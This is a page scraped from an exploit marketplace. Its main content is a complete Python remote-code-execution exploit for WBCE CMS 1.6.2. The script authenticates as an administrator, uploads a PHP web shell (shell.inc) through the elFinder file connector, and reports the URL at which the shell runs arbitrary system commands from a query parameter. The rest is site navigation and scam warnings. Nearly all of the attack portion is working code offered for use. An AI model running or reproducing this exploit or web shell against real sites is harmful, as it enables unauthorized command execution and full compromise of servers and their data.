0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WBCE CMS v1.6.2 - Remote Code Execution Exploit
# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE) # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip # Version: 1.6.2 # Tested on: MacOS import requests from bs4 import BeautifulSoup import sys import time def login(url, username, password): print("Logging in...") time.sleep(3) with requests.Session() as session: response = session.get(url + "/admin/login/index.php") soup = BeautifulSoup(response.text, 'html.parser') form = soup.find('form', attrs={'name': 'login'}) form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'} # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password post_response = session.post(url + "/admin/login/index.php", data=form_data) if "Administration" in post_response.text: print("Login successful!") time.sleep(3) return session else: print("Login failed.") print("Headers received:", post_response.headers) print("Response content:", post_response.text[:500]) # İlk 500 karakter return None def upload_file(session, url): # Dosya içeriğini ve adını belirleyin print("Shell preparing...") time.sleep(3) files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')} data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' } response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data) if response.status_code == 200: print("Your Shell is Ready: " + url + "/media/shell.inc") else: print("Failed to upload file.") print(response.text) if __name__ == "__main__": url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(url, username, password) if session: upload_file(session, url) # 0day.today [2024-06-28] #